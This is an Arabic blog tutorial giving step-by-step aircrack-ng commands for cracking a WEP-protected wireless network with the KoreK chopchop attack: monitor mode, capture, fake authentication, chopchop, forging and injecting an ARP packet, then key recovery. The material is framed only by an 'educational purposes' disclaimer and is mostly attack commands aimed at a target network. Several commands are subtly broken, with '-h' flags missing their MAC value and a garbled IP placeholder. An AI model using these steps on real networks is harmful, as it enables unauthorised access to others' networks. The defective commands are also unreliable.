تحدثنا سابقا عن فك تشفير WEP دون الحاجة الى لوجود أي جهاز (client) متصل بالشبكة الهدف باستخدام fake authentication attack أما اليوم فسنستخدم طريفة اخرى تدعى korek chopchop attack لكسر تشفير شبكة وايرلس تستخدم تشفير WEP في أقل من 10 دقائق.

ملاحظة: الشرح من توزيعة backtrack3 ويمكن تطبيقه من أي توزيعة لينكس اخرى بعد تثبيت حزمة aircrack-ng.

الفيديو للغرض التعليمي فقط و أنا غير مسؤول عن أي استخدام خاطئ للمعلومات المذكورة في الشرح

الفيديو:

 

الخطوات:

1. سنحتاج الى وضع كرت الوايرلس في الـ monitor mode بتنفيذ الأمر:

airmon-ng start [interface]

حيث: interface هو اسم كرت الوايرلس الخاص بك.

 

2. استخدام برنامج airodump-ng لمشاهدة الشبكات المتوفرة بتنفيذ الأمر:

airodump-ng [interface]

 

3. تشغيل برنامج airodump-ng لجمع الحزم من الشبكة الهدف

airodump-ng -c  [channel] –bssid [target BSSID] -w out [interface]

حيث:
channel القناة اللتي تعمل عليها الشبكة
bssid الماك ادرس الخاص بالشبكة
out اسم الملف الذي ستحفظ فيه الحزم

 

4. عمل fake authentication للـ AP الخاص بنا على الشبكة الهدف حتى نستطيع تنفيذ chopchop attack في الخطوة القادمة

توضيح: اذا قمنا بنفيذ chopchop attack مباشرة دون القيام بهذه الخطوة فان الشبكة الهدف ستقوم بارسال حزم deauthentication و بالتالي سيفشل الهجوم و لذلك سنقوم بعمل fake authentication (تصريح مزيف) لجهازنا لنتمكن من تنفيذ chopchop attack
ملاحظة: بعد تنفيذ هذه الخطوة سوف تشاهد ظهور كلمة OPN في حقل AUTH في نافذة برنامج airodump-ng.

aireplay-ng -1 0 -a [target bssid] -h -e [target ESSID] [interface]

حيث:
target bssid ماك أدرس الخاص بالشبكة
source MAC address ماك أدرس الخاص بك و يمكننا معرفته من خلال تنفيذ الامر

ifconfig [interface]

حيث: target essid اسم الشبكة الهدف

 

5. استخدام برنامج aireplay-ng للبدء بالـ chopchop attack

aireplay-ng -4 -b [target BSSID] -h [interface]

 

6. استخدام برنامج packetforge لتكوين حزمة arp التي سوف نحقنها في الشبكة الهدف

packetforge-ng -0 -a [target BSSID] -h -k  [destination IP in fragments] -l -y arp.xor -w [output2]

 

7. حقن الحزمة المكونة في الخطوة 6 باستخدام برنامج aireplay-ng

aireplay-ng -2 -r [output2] [interface]

حيث: r- الحزمة المكونة في الخطوة السابقة

 

8. فك التشفير بالستخدام برنامج aircrack-ng

aircrack-ng [file]

حيث: file الملف الذي تم تخزين الحزم فية من الخطوة 3

ان شاء الله يكون الشرح واضح و اي استفسار اني حاضر

دمتم بود

Zaid S.Hussien

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn